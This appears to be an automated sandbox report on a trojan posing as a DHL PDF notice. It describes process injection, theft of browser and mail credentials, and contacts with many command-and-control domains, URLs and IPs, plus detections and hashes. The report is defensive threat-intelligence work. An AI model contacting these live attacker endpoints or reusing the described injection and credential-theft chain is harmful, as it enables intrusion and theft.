          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, CopyFileW, CloseHandle, ExitProcess, OleUninitialize, ExitProcess, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

          Stealing of Sensitive Information

          Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Native API | Path Interception | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 512 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 5 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Software Packing | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Masquerading | NTDS | 2 Virtualization/Sandbox Evasion | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 512 Process Injection | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Behavior Graph
          ID: 831175, Sample: DHL_Notice_pdf.exe, Start date: 21/03/2023, Architecture: WINDOWS, Score: 100

          Top-level DNS/IP info and signatures:
          • www.madliainsalu.com
          • madliainsalu.com
          • Snort IDS alert for network traffic
          • Multi AV Scanner detection for domain / URL
          • Malicious sample detected (through community Yara rule)
          • 5 other signatures

          Process chain:
          • DHL_Notice_pdf.exe (started)
              Dropped file: C:\Users\user\AppData\Local\...\zkvixbqxp.exe, PE32
              Started: zkvixbqxp.exe
          • zkvixbqxp.exe (started by DHL_Notice_pdf.exe)
              Signature: Multi AV Scanner detection for dropped file
              Signature: Detected unpacking (changes PE section rights)
              Signature: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Signature: Maps a DLL or memory area into another process
              Started: zkvixbqxp.exe, conhost.exe
          • zkvixbqxp.exe (started by zkvixbqxp.exe)
              Signature: Modifies the context of a thread in another process (thread injection)
              Signature: Maps a DLL or memory area into another process
              Signature: Sample uses process hollowing technique
              Signature: Queues an APC in another process (thread injection)
              Injected: explorer.exe
          • explorer.exe (injected by zkvixbqxp.exe)
              DNS/IP: bohndigitaltech.com 162.241.24.110, 49708, 49709, 49710 UNIFIEDLAYER-AS-1US United States
              DNS/IP: kunimi.org 219.94.129.181, 49702, 49703, 49704 SAKURA-CSAKURAInternetIncJP Japan
              DNS/IP: 11 other IPs or domains
              Signature: System process connects to network (likely due to code injection or exploit)
              Signature: Performs DNS queries to domains with low reputation
              Started: cmmon32.exe
          • cmmon32.exe (started by explorer.exe)
              Signature: Tries to steal Mail credentials (via file / registry access)
              Signature: Tries to harvest and steal browser information (history, passwords, etc)
              Signature: Modifies the context of a thread in another process (thread injection)
              Signature: Maps a DLL or memory area into another process

          Source | Detection | Scanner | Label | Link
          DHL_Notice_pdf.exe | 46% | ReversingLabs | Win32.Trojan.Fragtor |
          DHL_Notice_pdf.exe | 42% | Virustotal | | Browse
          DHL_Notice_pdf.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe | 27% | ReversingLabs | Win32.Trojan.Fragtor |

          Source | Detection | Scanner | Label | Link | Download
          1.2.zkvixbqxp.exe.9f0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          3.2.zkvixbqxp.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Source | Detection | Scanner | Label | Link
          kunimi.org | 4% | Virustotal | | Browse
          bohndigitaltech.com | 5% | Virustotal | | Browse
          rifleroofers.com | 0% | Virustotal | | Browse
                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==true
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.0dhy.xyz/hpb7/true
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.kunimi.org/hpb7/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.traindic.top/hpb7/true
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.bohndigitaltech.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.bohndigitaltech.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ==true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.denko-kosan.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-Xtrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.rifleroofers.com/hpb7/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.denko-kosan.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ==true
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.kunimi.orgexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/chrome_newtabcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                      high
                                      https://duckduckgo.com/ac/?q=146E771M.5.drfalse
                                        high
                                        http://www.buymyenergy.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mindsetlighting.xyz/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.bohndigitaltech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsexplorer.exe, 00000004.00000002.517404436.000000001584A000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.0000000004EEA000.00000004.10000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.amirah.cfdexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://search.yahoo.com?fr=crmas_sfpfcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                          high
                                          http://www.amirah.cfd/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://www.buymyenergy.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bisarropainting.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.admet01.clubReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.adoptiveimmunotech.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.madliainsalu.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kunimi.org/hpb7/Iexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.creative-shield.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kotelak.ruexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.0dhy.xyzexplorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bohndigitaltech.com/hpb7/Xz.explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.amirah.cfdReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.kotelak.ru/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.creative-shield.com/hpb7/:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.admet01.clubexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.adoptiveimmunotech.com/hpb7/jexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.bisarropainting.com/hpb7/explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                            high
                                            http://www.madliainsalu.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kotelak.ruReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.rifleroofers.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.denko-kosan.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.513596661.000000000B74D000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.madliainsalu.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.mindsetlighting.xyzReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.buymyenergy.com/hpb7/explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=146E771M.5.drfalse
                                              high
                                              http://www.denko-kosan.comReferer:explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                high
                                                http://www.adoptiveimmunotech.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://nsis.sf.net/NSIS_ErrorErrorDHL_Notice_pdf.exefalse
                                                  high
                                                  http://www.creative-shield.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                    high
                                                    http://rifleroofers.com/hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1explorer.exe, 00000004.00000002.517404436.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.506713363.00000000056C4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.adoptiveimmunotech.comexplorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.creative-shield.comReferer:explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=146E771M.5.drfalse
                                                      high
                                                      https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
198.46.160.97 | www.0dhy.xyz | United States | 36352 | AS-COLOCROSSINGUS | true
67.222.24.48 | rifleroofers.com | United States | 63410 | PRIVATESYSTEMSUS | true
49.212.180.95 | denko-kosan.com | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true
1.13.186.125 | www.yongleproducts.com | China | 13335 | CLOUDFLARENETUS | true
162.241.24.110 | bohndigitaltech.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
219.94.129.181 | kunimi.org | Japan | 9371 | SAKURA-CSAKURAInternetIncJP | true
162.0.231.77 | www.traindic.top | Canada | 22612 | NAMECHEAP-NETUS | true
                                                          Joe Sandbox Version:37.0.0 Beryl
                                                          Analysis ID:831175
                                                          Start date and time:2023-03-21 08:06:06 +01:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 1s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample file name:DHL_Notice_pdf.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@8/5@14/7
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 65.2% (good quality ratio 59.3%)
                                                          • Quality average: 72.2%
                                                          • Quality standard deviation: 31.8%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 131
                                                          • Number of non-executed functions: 66
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240, 209.197.3.8
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:07:18 | API Interceptor | 467x Sleep call for process: explorer.exe modified
                                                          Process:C:\Windows\SysWOW64\cmmon32.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):94208
                                                          Entropy (8bit):1.2882898331044472
                                                          Encrypted:false
                                                          SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                          MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                          SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                          SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                          SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:OpenPGP Public Key
                                                          Category:dropped
                                                          Size (bytes):209991
                                                          Entropy (8bit):7.998709566109535
                                                          Encrypted:true
                                                          SSDEEP:3072:GOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0SZ:GOXQocQ+EK9TVKEYydky+XfHPpYFZG/
                                                          MD5:9203F8F38EDD3B6CEE9B5647706C4747
                                                          SHA1:9EA9A90EB73A07AC7B6710D752A1A2DCC7E0ED76
                                                          SHA-256:4B2DB80CC55681E7CD277C2DC4BD5BB67E1E4EE03F4665D214DBC9BBECCABFC8
                                                          SHA-512:0669801D821650A9AF04D35BBAEE776B2D91A09A0E4630AB7EB22C93711FE57E9FF76268953ED918CE98F8DE22AFB0C8AAEA11BDFE91CBE245743EB273C56B69
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):233940
                                                          Entropy (8bit):7.852327544537286
                                                          Encrypted:false
                                                          SSDEEP:3072:2sOVZQocPBPtCQ8T+EZ/9vRImoqPeTVKaoQQe8esYNdoytWygtFK1b2fH3HFOM0N:XOXQocQ+EK9TVKEYydky+XfHPpYFZGw
                                                          MD5:CB7BDC432B7BA8C7ED8B489D5F08A081
                                                          SHA1:A58E23586ED03EBB8B0D7670383F92C80F07D9A5
                                                          SHA-256:81E2187A7CD1186869B5F492E68CBAC1EF8B404DD893EF9AC7295093C6C8C227
                                                          SHA-512:5FD7458B503BA3AE3514236B2FFBE4AEED27E651994F8C2BDC50BFCAF8A7D1E5705CF7FFDE87A7BB144B72FFA2E52F3DF97B139610C5448BA91B75312188BFFB
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6099
                                                          Entropy (8bit):7.134928677733547
                                                          Encrypted:false
                                                          SSDEEP:96:Farc6oY0Wg/DrYuDk2XO5oSw09LFQiY3XdQSkwKOYJ8CJZT0v81DJi6p:FarcRTrhX1SJ9LOn3tRkwtxE1D7
                                                          MD5:0A06F95BA28B6704B7DBC7F68D1B5BE4
                                                          SHA1:F1118B8640DFB7533F744FBD8CD24780D04650CD
                                                          SHA-256:4F6DAE66BA6DC6B3EBBABD57F2A4404AF38452EC3677A779D5F41A378982B0E1
                                                          SHA-512:417FB43A079FEC2A3702EA562E51A3E5EAEFD64D753302A3BC31AE867E2C50AE8D081883D247433F6A09C71C83EF09BFFF0B38942C1A14DEA3D60435E1B50688
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\DHL_Notice_pdf.exe
                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5632
                                                          Entropy (8bit):4.4633891846895075
                                                          Encrypted:false
                                                          SSDEEP:96:G8wZF3bluZzQb5P4oyn/7JhpywpZ6uYHrAhBPxesU8:G8UF3bY1SP4oynl/ycZ6uYHrSBwsU8
